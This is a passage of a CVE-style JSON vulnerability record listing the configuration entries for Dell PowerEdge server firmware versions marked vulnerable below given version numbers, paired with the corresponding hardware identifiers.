"versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4510c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr4520c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr4520c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t150_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t150:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r250_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r250:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r350_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.9.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r350:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7515_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7515:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r7525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r7525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6525_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6525:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe8545_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe8545:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.2", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r540_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r540:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xr2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xr2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r740xd2_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r740xd2:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r840_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r840:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r940xa_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r940xa:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m640_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m640_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx740c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx740c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_mx840c_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_mx840c:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:dss_8440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:dss_8440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe2420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.1", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe2420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7420_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7420:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_xe7440_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.21.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_xe7440:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t140_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t140:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r240_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r240:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r340_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.16.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r340:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r730xd_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r730xd:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c4130_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c4130:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r930_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.14.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r930:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m630_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m630_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_m830_\\(pe_vrtx\\)_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_m830_\\(pe_vrtx\\):-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_fc830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_fc830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t630_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t630:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r530_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r530:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_t430_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_t430:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_r830_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "1.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_r830:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:dell:poweredge_c6320_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.19.0", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:dell:poweredge_c6320:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : 